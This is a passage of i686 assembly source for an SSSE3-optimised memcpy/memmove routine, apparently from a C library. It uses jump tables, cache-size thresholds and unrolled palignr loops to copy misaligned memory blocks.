cfi_adjust_cfa_offset (4); \
cfi_rel_offset (REG, 0)
#define CFI_POP(REG) \
cfi_adjust_cfa_offset (-4); \
cfi_restore (REG)
#define PUSH(REG) pushl REG; CFI_PUSH (REG)
#define POP(REG) popl REG; CFI_POP (REG)
#ifdef SHARED
# define PARMS 8 /* Preserve EBX. */
# define ENTRANCE PUSH (%ebx);
# define RETURN_END POP (%ebx); ret
# define RETURN RETURN_END; CFI_PUSH (%ebx)
# define JMPTBL(I, B) I - B
/* Load an entry in a jump table into EBX and branch to it. TABLE is a
jump table with relative offsets. INDEX is a register contains the
index into the jump table. SCALE is the scale of INDEX. */
# define BRANCH_TO_JMPTBL_ENTRY(TABLE, INDEX, SCALE) \
/* We first load PC into EBX. */ \
call __i686.get_pc_thunk.bx; \
/* Get the address of the jump table. */ \
addl $(TABLE - .), %ebx; \
/* Get the entry and convert the relative offset to the \
absolute address. */ \
addl (%ebx,INDEX,SCALE), %ebx; \
/* We loaded the jump table. Go. */ \
jmp *%ebx
# define BRANCH_TO_JMPTBL_ENTRY_VALUE(TABLE) \
addl $(TABLE - .), %ebx
# define BRANCH_TO_JMPTBL_ENTRY_TAIL(TABLE, INDEX, SCALE) \
addl (%ebx,INDEX,SCALE), %ebx; \
/* We loaded the jump table. Go. */ \
jmp *%ebx
.section .gnu.linkonce.t.__i686.get_pc_thunk.bx,"ax",@progbits
.globl __i686.get_pc_thunk.bx
.hidden __i686.get_pc_thunk.bx
ALIGN (4)
.type __i686.get_pc_thunk.bx,@function
__i686.get_pc_thunk.bx:
movl (%esp), %ebx
ret
#else
# define PARMS 4
# define ENTRANCE
# define RETURN_END ret
# define RETURN RETURN_END
# define JMPTBL(I, B) I
/* Branch to an entry in a jump table. TABLE is a jump table with
absolute offsets. INDEX is a register contains the index into the
jump table. SCALE is the scale of INDEX. */
# define BRANCH_TO_JMPTBL_ENTRY(TABLE, INDEX, SCALE) \
jmp *TABLE(,INDEX,SCALE)
# define BRANCH_TO_JMPTBL_ENTRY_VALUE(TABLE)
# define BRANCH_TO_JMPTBL_ENTRY_TAIL(TABLE, INDEX, SCALE) \
jmp *TABLE(,INDEX,SCALE)
#endif
.section .text.ssse3,"ax",@progbits
ENTRY (MEMCPY)
ENTRANCE
movl LEN(%esp), %ecx
movl SRC(%esp), %eax
movl DEST(%esp), %edx
#ifdef USE_AS_MEMMOVE
cmp %eax, %edx
jb L(copy_forward)
je L(fwd_write_0bytes)
cmp $32, %ecx
jae L(memmove_bwd)
jmp L(bk_write_less32bytes_2)
L(memmove_bwd):
add %ecx, %eax
cmp %eax, %edx
movl SRC(%esp), %eax
jb L(copy_backward)
L(copy_forward):
#endif
cmp $48, %ecx
jae L(48bytesormore)
L(fwd_write_less32bytes):
#ifndef USE_AS_MEMMOVE
cmp %dl, %al
jb L(bk_write)
#endif
add %ecx, %edx
add %ecx, %eax
BRANCH_TO_JMPTBL_ENTRY (L(table_48bytes_fwd), %ecx, 4)
#ifndef USE_AS_MEMMOVE
L(bk_write):
BRANCH_TO_JMPTBL_ENTRY (L(table_48_bytes_bwd), %ecx, 4)
#endif
ALIGN (4)
/* ECX > 32 and EDX is 4 byte aligned. */
L(48bytesormore):
movdqu (%eax), %xmm0
PUSH (%edi)
movl %edx, %edi
and $-16, %edx
PUSH (%esi)
add $16, %edx
movl %edi, %esi
sub %edx, %edi
add %edi, %ecx
sub %edi, %eax
#ifdef SHARED_CACHE_SIZE_HALF
cmp $SHARED_CACHE_SIZE_HALF, %ecx
#else
# ifdef SHARED
call __i686.get_pc_thunk.bx
add $_GLOBAL_OFFSET_TABLE_, %ebx
cmp __x86_shared_cache_size_half@GOTOFF(%ebx), %ecx
# else
cmp __x86_shared_cache_size_half, %ecx
# endif
#endif
mov %eax, %edi
jae L(large_page)
and $0xf, %edi
jz L(shl_0)
BRANCH_TO_JMPTBL_ENTRY (L(shl_table), %edi, 4)
ALIGN (4)
L(shl_0):
movdqu %xmm0, (%esi)
xor %edi, %edi
POP (%esi)
cmp $127, %ecx
ja L(shl_0_gobble)
lea -32(%ecx), %ecx
L(shl_0_loop):
movdqa (%eax, %edi), %xmm0
movdqa 16(%eax, %edi), %xmm1
sub $32, %ecx
movdqa %xmm0, (%edx, %edi)
movdqa %xmm1, 16(%edx, %edi)
lea 32(%edi), %edi
jb L(shl_0_end)
movdqa (%eax, %edi), %xmm0
movdqa 16(%eax, %edi), %xmm1
sub $32, %ecx
movdqa %xmm0, (%edx, %edi)
movdqa %xmm1, 16(%edx, %edi)
lea 32(%edi), %edi
jb L(shl_0_end)
movdqa (%eax, %edi), %xmm0
movdqa 16(%eax, %edi), %xmm1
sub $32, %ecx
movdqa %xmm0, (%edx, %edi)
movdqa %xmm1, 16(%edx, %edi)
lea 32(%edi), %edi
jb L(shl_0_end)
movdqa (%eax, %edi), %xmm0
movdqa 16(%eax, %edi), %xmm1
sub $32, %ecx
movdqa %xmm0, (%edx, %edi)
movdqa %xmm1, 16(%edx, %edi)
lea 32(%edi), %edi
L(shl_0_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
add %edi, %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY (L(table_48bytes_fwd), %ecx, 4)
L(shl_0_gobble):
#ifdef DATA_CACHE_SIZE_HALF
cmp $DATA_CACHE_SIZE_HALF, %ecx
#else
# ifdef SHARED
call __i686.get_pc_thunk.bx
add $_GLOBAL_OFFSET_TABLE_, %ebx
cmp __x86_data_cache_size_half@GOTOFF(%ebx), %ecx
# else
cmp __x86_data_cache_size_half, %ecx
# endif
#endif
POP (%edi)
lea -128(%ecx), %ecx
jae L(shl_0_gobble_mem_loop)
L(shl_0_gobble_cache_loop):
movdqa (%eax), %xmm0
movdqa 0x10(%eax), %xmm1
movdqa 0x20(%eax), %xmm2
movdqa 0x30(%eax), %xmm3
movdqa 0x40(%eax), %xmm4
movdqa 0x50(%eax), %xmm5
movdqa 0x60(%eax), %xmm6
movdqa 0x70(%eax), %xmm7
lea 0x80(%eax), %eax
sub $128, %ecx
movdqa %xmm0, (%edx)
movdqa %xmm1, 0x10(%edx)
movdqa %xmm2, 0x20(%edx)
movdqa %xmm3, 0x30(%edx)
movdqa %xmm4, 0x40(%edx)
movdqa %xmm5, 0x50(%edx)
movdqa %xmm6, 0x60(%edx)
movdqa %xmm7, 0x70(%edx)
lea 0x80(%edx), %edx
jae L(shl_0_gobble_cache_loop)
cmp $-0x40, %ecx
lea 0x80(%ecx), %ecx
jl L(shl_0_cache_less_64bytes)
movdqa (%eax), %xmm0
sub $0x40, %ecx
movdqa 0x10(%eax), %xmm1
movdqa %xmm0, (%edx)
movdqa %xmm1, 0x10(%edx)
movdqa 0x20(%eax), %xmm0
movdqa 0x30(%eax), %xmm1
add $0x40, %eax
movdqa %xmm0, 0x20(%edx)
movdqa %xmm1, 0x30(%edx)
add $0x40, %edx
L(shl_0_cache_less_64bytes):
cmp $0x20, %ecx
jb L(shl_0_cache_less_32bytes)
movdqa (%eax), %xmm0
sub $0x20, %ecx
movdqa 0x10(%eax), %xmm1
add $0x20, %eax
movdqa %xmm0, (%edx)
movdqa %xmm1, 0x10(%edx)
add $0x20, %edx
L(shl_0_cache_less_32bytes):
cmp $0x10, %ecx
jb L(shl_0_cache_less_16bytes)
sub $0x10, %ecx
movdqa (%eax), %xmm0
add $0x10, %eax
movdqa %xmm0, (%edx)
add $0x10, %edx
L(shl_0_cache_less_16bytes):
add %ecx, %edx
add %ecx, %eax
BRANCH_TO_JMPTBL_ENTRY (L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_0_gobble_mem_loop):
prefetcht0 0x1c0(%eax)
prefetcht0 0x280(%eax)
prefetcht0 0x1c0(%edx)
movdqa (%eax), %xmm0
movdqa 0x10(%eax), %xmm1
movdqa 0x20(%eax), %xmm2
movdqa 0x30(%eax), %xmm3
movdqa 0x40(%eax), %xmm4
movdqa 0x50(%eax), %xmm5
movdqa 0x60(%eax), %xmm6
movdqa 0x70(%eax), %xmm7
lea 0x80(%eax), %eax
sub $0x80, %ecx
movdqa %xmm0, (%edx)
movdqa %xmm1, 0x10(%edx)
movdqa %xmm2, 0x20(%edx)
movdqa %xmm3, 0x30(%edx)
movdqa %xmm4, 0x40(%edx)
movdqa %xmm5, 0x50(%edx)
movdqa %xmm6, 0x60(%edx)
movdqa %xmm7, 0x70(%edx)
lea 0x80(%edx), %edx
jae L(shl_0_gobble_mem_loop)
cmp $-0x40, %ecx
lea 0x80(%ecx), %ecx
jl L(shl_0_mem_less_64bytes)
movdqa (%eax), %xmm0
sub $0x40, %ecx
movdqa 0x10(%eax), %xmm1
movdqa %xmm0, (%edx)
movdqa %xmm1, 0x10(%edx)
movdqa 0x20(%eax), %xmm0
movdqa 0x30(%eax), %xmm1
add $0x40, %eax
movdqa %xmm0, 0x20(%edx)
movdqa %xmm1, 0x30(%edx)
add $0x40, %edx
L(shl_0_mem_less_64bytes):
cmp $0x20, %ecx
jb L(shl_0_mem_less_32bytes)
movdqa (%eax), %xmm0
sub $0x20, %ecx
movdqa 0x10(%eax), %xmm1
add $0x20, %eax
movdqa %xmm0, (%edx)
movdqa %xmm1, 0x10(%edx)
add $0x20, %edx
L(shl_0_mem_less_32bytes):
cmp $0x10, %ecx
jb L(shl_0_mem_less_16bytes)
sub $0x10, %ecx
movdqa (%eax), %xmm0
add $0x10, %eax
movdqa %xmm0, (%edx)
add $0x10, %edx
L(shl_0_mem_less_16bytes):
add %ecx, %edx
add %ecx, %eax
BRANCH_TO_JMPTBL_ENTRY (L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_1):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -1(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_1_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $1, %xmm2, %xmm3
palignr $1, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_1_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $1, %xmm2, %xmm3
palignr $1, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_1_loop)
L(shl_1_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 1(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_2):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -2(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_2_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $2, %xmm2, %xmm3
palignr $2, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_2_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $2, %xmm2, %xmm3
palignr $2, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_2_loop)
L(shl_2_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 2(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_3):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -3(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_3_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $3, %xmm2, %xmm3
palignr $3, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_3_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $3, %xmm2, %xmm3
palignr $3, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_3_loop)
L(shl_3_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 3(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_4):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -4(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_4_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $4, %xmm2, %xmm3
palignr $4, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_4_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $4, %xmm2, %xmm3
palignr $4, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_4_loop)
L(shl_4_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 4(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_5):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -5(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_5_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $5, %xmm2, %xmm3
palignr $5, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_5_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $5, %xmm2, %xmm3
palignr $5, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_5_loop)
L(shl_5_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 5(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_6):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -6(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_6_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $6, %xmm2, %xmm3
palignr $6, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_6_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $6, %xmm2, %xmm3
palignr $6, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_6_loop)
L(shl_6_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 6(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_7):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -7(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_7_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $7, %xmm2, %xmm3
palignr $7, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_7_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $7, %xmm2, %xmm3
palignr $7, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_7_loop)
L(shl_7_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 7(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_8):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -8(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_8_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $8, %xmm2, %xmm3
palignr $8, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_8_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $8, %xmm2, %xmm3
palignr $8, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_8_loop)
L(shl_8_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 8(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_9):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -9(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_9_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $9, %xmm2, %xmm3
palignr $9, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_9_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $9, %xmm2, %xmm3
palignr $9, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_9_loop)
L(shl_9_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 9(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_10):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -10(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_10_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $10, %xmm2, %xmm3
palignr $10, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_10_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $10, %xmm2, %xmm3
palignr $10, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_10_loop)
L(shl_10_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 10(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_11):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -11(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_11_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $11, %xmm2, %xmm3
palignr $11, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_11_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $11, %xmm2, %xmm3
palignr $11, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_11_loop)
L(shl_11_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 11(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_12):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -12(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_12_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $12, %xmm2, %xmm3
palignr $12, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_12_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $12, %xmm2, %xmm3
palignr $12, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_12_loop)
L(shl_12_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 12(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_13):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -13(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_13_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $13, %xmm2, %xmm3
palignr $13, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_13_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $13, %xmm2, %xmm3
palignr $13, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_13_loop)
L(shl_13_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 13(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_14):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -14(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_14_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $14, %xmm2, %xmm3
palignr $14, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_14_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $14, %xmm2, %xmm3
palignr $14, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_14_loop)
L(shl_14_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 14(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(shl_15):
BRANCH_TO_JMPTBL_ENTRY_VALUE(L(table_48bytes_fwd))
lea -15(%eax), %eax
movaps (%eax), %xmm1
xor %edi, %edi
lea -32(%ecx), %ecx
movdqu %xmm0, (%esi)
POP (%esi)
L(shl_15_loop):
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm4
palignr $15, %xmm2, %xmm3
palignr $15, %xmm1, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jb L(shl_15_end)
movdqa 16(%eax, %edi), %xmm2
sub $32, %ecx
movdqa 32(%eax, %edi), %xmm3
movdqa %xmm3, %xmm1
palignr $15, %xmm2, %xmm3
palignr $15, %xmm4, %xmm2
lea 32(%edi), %edi
movdqa %xmm2, -32(%edx, %edi)
movdqa %xmm3, -16(%edx, %edi)
jae L(shl_15_loop)
L(shl_15_end):
lea 32(%ecx), %ecx
add %ecx, %edi
add %edi, %edx
lea 15(%edi, %eax), %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY_TAIL(L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(fwd_write_44bytes):
movl -44(%eax), %ecx
movl %ecx, -44(%edx)
L(fwd_write_40bytes):
movl -40(%eax), %ecx
movl %ecx, -40(%edx)
L(fwd_write_36bytes):
movl -36(%eax), %ecx
movl %ecx, -36(%edx)
L(fwd_write_32bytes):
movl -32(%eax), %ecx
movl %ecx, -32(%edx)
L(fwd_write_28bytes):
movl -28(%eax), %ecx
movl %ecx, -28(%edx)
L(fwd_write_24bytes):
movl -24(%eax), %ecx
movl %ecx, -24(%edx)
L(fwd_write_20bytes):
movl -20(%eax), %ecx
movl %ecx, -20(%edx)
L(fwd_write_16bytes):
movl -16(%eax), %ecx
movl %ecx, -16(%edx)
L(fwd_write_12bytes):
movl -12(%eax), %ecx
movl %ecx, -12(%edx)
L(fwd_write_8bytes):
movl -8(%eax), %ecx
movl %ecx, -8(%edx)
L(fwd_write_4bytes):
movl -4(%eax), %ecx
movl %ecx, -4(%edx)
L(fwd_write_0bytes):
#ifndef USE_AS_BCOPY
# ifdef USE_AS_MEMPCPY
movl %edx, %eax
# else
movl DEST(%esp), %eax
# endif
#endif
RETURN
ALIGN (4)
L(fwd_write_5bytes):
movl -5(%eax), %ecx
movl -4(%eax), %eax
movl %ecx, -5(%edx)
movl %eax, -4(%edx)
#ifndef USE_AS_BCOPY
# ifdef USE_AS_MEMPCPY
movl %edx, %eax
# else
movl DEST(%esp), %eax
# endif
#endif
RETURN
ALIGN (4)
L(fwd_write_45bytes):
movl -45(%eax), %ecx
movl %ecx, -45(%edx)
L(fwd_write_41bytes):
movl -41(%eax), %ecx
movl %ecx, -41(%edx)
L(fwd_write_37bytes):
movl -37(%eax), %ecx
movl %ecx, -37(%edx)
L(fwd_write_33bytes):
movl -33(%eax), %ecx
movl %ecx, -33(%edx)
L(fwd_write_29bytes):
movl -29(%eax), %ecx
movl %ecx, -29(%edx)
L(fwd_write_25bytes):
movl -25(%eax), %ecx
movl %ecx, -25(%edx)
